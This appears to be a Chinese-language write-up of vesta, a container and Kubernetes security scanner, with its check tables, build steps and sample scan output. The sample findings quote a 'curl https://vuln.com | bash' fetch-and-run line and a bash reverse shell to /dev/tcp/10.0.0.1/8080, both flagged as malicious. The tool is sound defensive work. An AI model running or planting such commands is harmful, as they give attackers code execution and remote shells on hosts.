#暑期創作大賽#
概述
vesta是一款集容器掃描,Docker和Kubernetes配置基線檢查于一身的工具。檢查内容包括鏡像或容器中包含漏洞版本的元件,同時根據雲上實戰滲透經驗檢查Docker以及Kubernetes的危險配置
vesta同時也是一個靈活,友善的工具,能夠在各種系統上運作,包括但不限于Windows,Linux以及MacOS
檢查項
Scan
- 掃描通過主流安裝方法安裝程式的漏洞
- apt/apt-get
- rpm
- yum
- dpkg
- 掃描軟體依賴的漏洞以及惡意投毒的依賴包
- Java(Jar, War, 以及主流依賴log4j)
- NodeJs(NPM, YARN)
- Python(Wheel, Poetry)
- Golang(Go binary)
- PHP(Composer, 以及主流的PHP架構: laravel, thinkphp, wordpress, wordpress插件等)
- Rust(Rust binary)
Docker檢查
| Supported | Check Item | Description | Severity | Reference |
| ✔ | PrivilegeAllowed | 危險的特權模式 | critical | Ref |
| ✔ | Capabilities | 危險capabilities被設定 | critical | Ref |
| ✔ | Volume Mount | 敏感或危險目錄被挂載 | critical | Ref |
| ✔ | Docker Unauthorized | 2375端口打開并且未授權 | critical | Ref |
| ✔ | Kernel version | 目前核心版本存在逃逸漏洞 | critical | Ref |
| ✔ | Network Module | Net模式為 host 模式或同時在特定containerd版本下 | critical/medium | |
| ✔ | Pid Module | Pid模式被設定為 host | high | |
| ✔ | Docker Server version | Docker Server版本存在漏洞 | critical/high/ medium/low | |
| ✔ | Docker env password check | Docker env是否存在弱密碼 | high/medium | |
| ✔ | Docker history | Docker layers 存在不安全的指令 | high/medium | |
| ✔ | Docker Backdoor | Docker env command 存在惡意指令 | critical/high | |
| ✔ | Docker Swarm | Docker Swarm存在危險配置資訊以及危險的容器檢測 | medium/low |
Kubernetes檢查
| Supported | Check Item | Description | Severity | Reference |
| ✔ | PrivilegeAllowed | 危險的特權模式 | critical | Ref |
| ✔ | Capabilities | 危險capabilities被設定 | critical | Ref |
| ✔ | PV and PVC | PV 被挂載到敏感目錄并且狀态為active | critical/medium | Ref |
| ✔ | RBAC | K8s 權限存在危險配置 | high/medium/ low/warning | |
| ✔ | Kubernetes-dashborad | 檢查 -enable-skip-login 以及 dashborad的賬戶權限 | critical/high/ low | Ref |
| ✔ | Kernel version | 目前核心版本存在逃逸漏洞 | critical | Ref |
| ✔ | Docker Server version (k8s versions is less than v1.24) | Docker Server版本存在漏洞 | critical/high/ medium/low | |
| ✔ | Kubernetes certification expiration | 證書到期時間小于30天 | medium | |
| ✔ | ConfigMap and Secret check | ConfigMap 或者 Secret是否存在弱密碼 | high/medium | |
| ✔ | PodSecurityPolicy check (k8s version under the v1.25) | PodSecurityPolicy過度容忍Pod不安全配置 | high/medium/low | Ref |
| ✔ | Auto Mount ServiceAccount Token | Pod預設挂載了service token | critical/high/ medium/low | Ref |
| ✔ | NoResourceLimits | 沒有限制資源的使用,例如CPU,Memory, 存儲 | low | Ref |
| ✔ | Job and Cronjob | Job或CronJob沒有設定seccomp或seLinux安全政策 | low | Ref |
| ✔ | Envoy admin | Envoy admin被配置以及監聽 0.0.0.0 . | high/medium | Ref |
| ✔ | Cilium version | Cilium 存在漏洞版本 | critical/high/ medium/low | Ref |
| ✔ | Istio configurations | Istio 存在漏洞版本以及安全配置檢查 | critical/high/ medium/low | Ref |
| ✔ | Kubelet 10255/10250 and Kubectl proxy | 存在node打開了10250或者10255并且未授權或 Kubectl proxy開啟 | high/medium/ low | |
| ✔ | Etcd configuration | Etcd 安全配置檢查 | high/medium | |
| ✔ | Sidecar configurations | Sidecar 安全配置檢查以及Env環境檢查 | critical/high/ medium/low | |
| ✔ | Pod annotation | Pod annotation 存在不安全配置 | high/medium/ low/warning | Ref |
| ✔ | DaemonSet | DaemonSet存在不安全配置 | critical/high/ medium/low | |
| ✔ | Backdoor | 檢查k8s中是否有後門 | critical/high | Ref |
| ✔ | Lateral admin movement | Pod被特意配置到Master節點中 | medium/low |
編譯并使用vesta
編譯vesta
- 使用make build 進行編譯
- 從Releases上下載下傳可執行檔案
使用vesta檢查鏡像過容器中的漏洞元件版本(使用鏡像ID,鏡像标簽或使用-f檔案輸入均可)
$./vesta scan container -f example.tar
2022/11/29 22:50:19 Begin upgrading vulnerability database
2022/11/29 22:50:19 Vulnerability Database is already initialized
2022/11/29 22:50:19 Begin to analyze the layer
2022/11/29 22:50:35 Begin to scan the layer
Detected 216 vulnerabilities
+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 208 | python3.6 - Django | 2.2.3 | CVE-2019-14232 | 7.5 | high | An issue was discovered |
| | | | | | | in Django 1.11.x before |
| | | | | | | 1.11.23, 2.1.x before 2.1.11, |
| | | | | | | and 2.2.x before 2.2.4. If |
| | | | | | | django.utils.text.Truncator's |
| | | | | | | chars() and words() methods |
| | | | | | | were passed the html=True |
| | | | | | | argument, t ... |
+-----+ +-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 209 | | 2.2.3 | CVE-2019-14233 | 7.5 | high | An issue was discovered |
| | | | | | | in Django 1.11.x before |
| | | | | | | 1.11.23, 2.1.x before 2.1.11, |
| | | | | | | and 2.2.x before 2.2.4. |
| | | | | | | Due to the behaviour of |
| | | | | | | the underlying HTMLParser, |
| | | | | | | django.utils.html.strip_tags |
| | | | | | | would be extremely ... |
+-----+ +-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 210 | | 2.2.3 | CVE-2019-14234 | 9.8 | critical | An issue was discovered in |
| | | | | | | Django 1.11.x before 1.11.23, |
| | | | | | | 2.1.x before 2.1.11, and 2.2.x |
| | | | | | | before 2.2.4. Due to an error |
| | | | | | | in shallow key transformation, |
| | | | | | | key and index lookups for |
| | | | | | | django.contrib.postgres.f ... |
+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 211 | python3.6 - numpy | 1.24.2 | | 8.5 | high | Malicious package is detected in |
| | | | | | | '/usr/local/lib/python3.6/site-packages/numpy/setup.py', |
| | | | | | | malicious command "curl https://vuln.com | bash" are |
| | | | | | | detected. |
+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+ 使用vesta檢查Docker的基線配置
也可以在docker中使用
make run.docker $./vesta analyze docker
2022/11/29 23:06:32 Start analysing
Detected 3 vulnerabilities
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| ID | CONTAINER DETAIL | PARAM | VALUE | SEVERITY | DESCRIPTION |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| 1 | Name: Kernel | kernel version | 5.10.104-linuxkit | critical | Kernel version is suffering |
| | ID: None | | | | the CVE-2022-0492 with |
| | | | | | CAP_SYS_ADMIN and v1 |
| | | | | | architecture of cgroups |
| | | | | | vulnerablility, has a |
| | | | | | potential container escape. |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| 2 | Name: vesta_vuln_test | kernel version | 5.10.104-linuxkit | critical | Kernel version is suffering |
| | ID: 207cf8842b15 | | | | the Dirty Pipe vulnerablility, |
| | | | | | has a potential container |
| | | | | | escape. |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| 3 | Name: Image Tag | Privileged | true | critical | There has a potential container|
| | ID: None | | | | escape in privileged module. |
| | | | | | |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| 4 | Name: Image Configuration | Image History | Image name: | high | Weak password found |
| | ID: None | | vesta_history_test:latest | | | in command: ' echo |
| | | | Image ID: 4bc05e1e3881 | | 'password=test123456' > |
| | | | | | config.ini # buildkit'. |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+ 使用vesta檢查Kubernetes的基線配置
2022/11/29 23:15:59 Start analysing
2022/11/29 23:15:59 Getting docker server version
2022/11/29 23:15:59 Getting kernel version
Detected 4 vulnerabilities
Pods:
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| ID | POD DETAIL | PARAM | VALUE | TYPE | SEVERITY | DESCRIPTION |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| 1 | Name: vulntest | Namespace: | sidecar name: vulntest | | true | Pod | critical | There has a potential |
| | default | Status: Running | | Privileged | | | | container escape in privileged |
| | Node Name: docker-desktop | | | | | module. |
+ + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| | | sidecar name: vulntest | | Token:Password123456 | Sidecar EnvFrom | high | Sidecar envFrom ConfigMap has |
| | | env | | | | found weak password: |
| | | | | | | 'Password123456'. |
+ + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| | | sidecar name: sidecartest | | MALWARE: bash -i >& | Sidecar Env | high | Container 'sidecartest' finds |
| | | env | /dev/tcp/10.0.0.1/8080 0>&1 | | | high risk content(score: |
| | | | | | | 0.91 out of 1.0), which is a |
| | | | | | | suspect command backdoor. |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| 2 | Name: vulntest2 | Namespace: | sidecar name: vulntest2 | | CAP_SYS_ADMIN | capabilities.add | critical | There has a potential |
| | default | Status: Running | | capabilities | | | | container escape in privileged |
| | Node Name: docker-desktop | | | | | module. |
+ + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| | | sidecar name: vulntest2 | | true | kube-api-access-lcvh8 | critical | Mount service account |
| | | automountServiceAccountToken | | | | and key permission are |
| | | | | | | given, which will cause a |
| | | | | | | potential container escape. |
| | | | | | | Reference clsuterRolebind: |
| | | | | | | vuln-clusterrolebinding | |
| | | | | | | roleBinding: vuln-rolebinding |
+ + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| | | sidecar name: vulntest2 | | cpu | Pod | low | CPU usage is not limited. |
| | | Resource | | | | |
| | | | | | | |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
Configures:
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| ID | TYPEL | PARAM | VALUE | SEVERITY | DESCRIPTION |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 1 | K8s version less than v1.24 | kernel version | 5.10.104-linuxkit | critical | Kernel version is suffering |
| | | | | | the CVE-2022-0185 with |
| | | | | | CAP_SYS_ADMIN vulnerablility, |
| | | | | | has a potential container |
| | | | | | escape. |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 2 | ConfigMap | ConfigMap Name: vulnconfig | db.string:mysql+pymysql://dbapp:Password123@db:3306/db | high | ConfigMap has found weak |
| | | Namespace: default | | | password: 'Password123'. |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 3 | Secret | Secret Name: vulnsecret-auth | password:Password123 | high | Secret has found weak |
| | | Namespace: default | | | password: 'Password123'. |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 4 | ClusterRoleBinding | binding name: | verbs: get, watch, list, | high | Key permissions with key |
| | | vuln-clusterrolebinding | | create, update | resources: | | resources given to the |
| | | rolename: vuln-clusterrole | | pods, services | | default service account, which |
| | | kind: ClusterRole | subject | | | will cause a potential data |
| | | kind: Group | subject name: | | | leakage. |
| | | system:serviceaccounts:vuln | | | | |
| | | namespace: vuln | | | |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 5 | RoleBinding | binding name: vuln-rolebinding | verbs: get, watch, list, | high | Key permissions with key |
| | | | rolename: vuln-role | role | create, update | resources: | | resources given to the |
| | | kind: Role | subject kind: | pods, services | | default service account, which |
| | | ServiceAccount | subject name: | | | will cause a potential data |
| | | default | namespace: default | | | leakage. |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 6 | ClusterRoleBinding | binding name: | verbs: get, watch, list, | warning | Key permission are given |
| | | vuln-clusterrolebinding2 | | create, update | resources: | | to unknown user 'testUser', |
| | | rolename: vuln-clusterrole | | pods, services | | printing it for checking. |
| | | subject kind: User | subject | | | |
| | | name: testUser | namespace: | | | |
| | | all | | | |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+ 使用方法
$./vesta -h
Vesta is a static analysis of vulnerabilities, Docker and Kubernetes configuration detect toolkit
Tutorial is available at https://github.com/kvesta/vesta
Usage:
vesta [command]
Available Commands:
analyze Kubernetes analyze
completion Generate the autocompletion script for the specified shell
help Help about any command
scan Container scan
update Update vulnerability database
version Print version information and quit
Flags:
-h, --help help for vesta 項目位址:https://github.com/kvesta/vesta/